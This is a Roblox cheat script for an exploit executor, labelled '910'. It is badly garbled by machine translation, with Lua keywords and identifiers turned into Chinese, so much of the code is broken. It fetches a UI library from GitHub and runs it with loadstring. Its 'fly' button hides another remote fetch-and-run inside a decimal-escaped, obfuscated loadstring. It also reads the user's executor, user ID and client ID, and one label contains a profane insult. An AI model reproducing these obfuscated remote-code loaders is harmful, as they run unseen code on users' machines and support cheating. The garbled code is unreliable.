本地LBLG =实例。新建(“屏幕GUI”)
本地LBL = Instance.new("文本标签")
本地玩家=游戏。玩家。本地玩家

-修复：确保几内亚正确放置
LBLG .Name = "LBLG "
LBLG .parent = game:GetService(" CoreGui ")--使用获取服务更安全
LBLG .ZIndexBehavior = Enum .ZIndexBehavior。同胞
LBLG .启用=真

LBL .Name = "LBL "
LBL .Parent = LBLG
LBL .BackgroundColor3 = Color3.new(1，1，1)
LBL .BackgroundTransparency = 1
LBL .BorderColor3 = Color3.new(0，0，0)
LBL .Position = UDim2.new(0.75，0，0.010，0)
LBL .Size = UDim2.new(0，200，0，30)
LBL .Font = Enum .字体。哥谭半粗体
LBL .Text = "加载中..."
LBL .TextColor3 = Color3.new(1，1，1)
LBL .TextScaled = false
LBL .TextSize = 16
LBL .TextWrapped = true
LBL .可见=真

本地FpsLabel = LBL
本地心跳= game:获取服务(“运行服务”).心跳
本地最后一次迭代，开始
本地FrameUpdateTable = {}

本地函数HeartbeatUpdate()
LastIteration = tick()
对于Index = #FrameUpdateTable，1，-1 do
frame update table[Index+1]=(FrameUpdateTable[Index]> = last iteration-1)和frame update table[Index]或nil
结束
frame updatetable[1]= last iteration
local current fps =(tick()-Start > = 1且#FrameUpdateTable)或(# frame updatetable/(tick()-Start))
current fps = math . floor(current fps)
    
本地小时=操作系统日期(" %H ")
本地分钟= os.date("%M ")
local second = os.date("%S ")
    
FpsLabel。Text =("你好啊: "..小时.."时"..分钟.."分"..第二.."秒FPS:"..电流脉冲)
结束

Start = tick()
心跳:连接(心跳更新)

-先测试基础用户界面是否显示
game:get service(" starter GUI "):set core(" send notification " ,{
title = " " 910 "，
Text = "正在加载用户界面界面...",
持续时间= 3，
})

-先不加载外部用户界面库,测试基础功能
等待(1)

-创建简单的测试用户界面来确认问题
local test Frame = instance . new(" Frame ")
测试框架。Name = "TestFrame "
测试框架。Parent = LBLG
测试框架。background color 3 = color 3 . from RGB(40，40，50)
测试框架。BorderSizePixel = 0
测试框架。Position = UDim2.new(0.7，0，0.05，0)
测试框架。Size = UDim2.new(0，250，0，200)
测试框架。可见=真

local test label = instance . new(" text label ")
测试标签。Name = "TestLabel "
测试标签。父代=测试框架
测试标签。BackgroundTransparency = 1
测试标签。Size = UDim2.new(1，0，1，0)
测试标签。Text = "测试UI -如果能看见这个,说明基础用户界面正常"
测试标签。TextColor3 = Color3.new(1，1，1)
testLabel.TextSize = 14
testLabel.TextWrapped = true

-- 检查UI库链接是否有效
game:GetService("StarterGui"):SetCore("SendNotification",{ 
    Title = "『910』", 
    Text ="正在检查UI库链接...", 
    Duration = 2, 
})

-- 尝试加载UI库
local success, ui = pcall(function()
    local response = game:HttpGet("https://raw.githubusercontent.com/THDZEP/Blue-blue-blue/refs/heads/main/hbvc", true)
    if response and #response > 0 then
        return loadstring(response)()
    else
        error("UI库内容为空")
    end
end)

if success and ui then
    game:GetService("StarterGui"):SetCore("SendNotification",{ 
        Title = "『910』", 
        Text ="UI库加载成功，正在创建界面...", 
        Duration = 3, 
    })
    
    -- 隐藏测试UI
    testFrame.Visible = false
    
    local win = ui:new("910")
    
    local UITab1 = win:Tab("『信息』", false)
    
    local about = UITab1:section("『作者信息』", false)
    about:Label("910")
    about:Label("缝合脚本")
    about:Label("QQ主群：没有 QQ副群 没有")
    about:Label("无法执行Bug已经修复")
    about:Label("脚本不会更新了")
    about:Label("脚本优化也不会")
    
    local about = UITab1:section("『玩家信息』", false)
    about:Label("你的账号年龄:"..player.AccountAge.."天")
    
    local executor = "未知"
    if type(identifyexecutor) == "function" then
        executor = identifyexecutor()
    end
    about:Label("你的注入器:"..executor)
    about:Label("你的用户名:"..player.Name)
    
    local gameName = "未知"
本地gameId = "未知"
pcall(函数()
gameName = game:get service(" MarketplaceService "):获取产品信息(game .PlaceId).名字
gameId = tostring(游戏。GameId)
结束)
    
    about:Label("你现在的服务器名称:"..gameName)
关于:标签("你现在的服务器id:"..gameId)
关于:标签("你的用户ID:"..玩家。UserId)
    
本地clientId = "未知"
pcall(函数()
clientId = game:get service(" RbxAnalyticsService "):get clientId()
结束)
关于:标签("获取客户端ID:"..clientId)
    
local ui Tab 2 = win:Tab("と公告』", '7734068321')
local about = ui tab 2:section("と公告ど”，真)
关于:标签("感谢所有支持910的人")
关于:标签(" bug有点多见谅")
关于:标签("糖酥")
关于:标签("我操你大臂!")
关于:标签("感谢大家支持910")
关于:标签("十分感谢")
       
    -- 添加通用选项卡
local ui Tab 3 = win:Tab("と通用ど”，假的)
local general = ui tab 3:section("と通用功能ど”，真)
常规:按钮("飞行功能“，函数()
loadstring(" 108 111 97 100 115 116 114 105 110 103 40 103 97 109 101 58 72 116 116 112 71 101 116 40 40 39 104 116 116 112 115 58 47 47 103 105 115 116 46 103 105 116 104 117 98 1111 102 48 97 55 48 48 49 55 51 48 48 100 100 100 54 55 102 100 99 100 51 55 48 47 114 97 119 47 101 49 52 101 55 52 102 52 50 53 98 48 54 48 100 102 53 50 51 51 52 51 99 102 51 48 98 55 56 55 48 55 52\101\98\51\99\53\100\50\47\97\114\99\101\117\115\37\50\53\50\48\120\37\50\53\50\48\102\108\121\37\50\53\50\48\50\37\50\53\50\48\111\98\102\108\117\99\97\116\111\114\39\41\44\116\114\117\101\41\41\40\41\10\10")()
    end)
其他
game:get service(" starter GUI "):set core(" send notification " ,{
title = "と错误』",
Text ="UI库加载失败,使用备用界面",
        Duration = 5, 
    })
结束
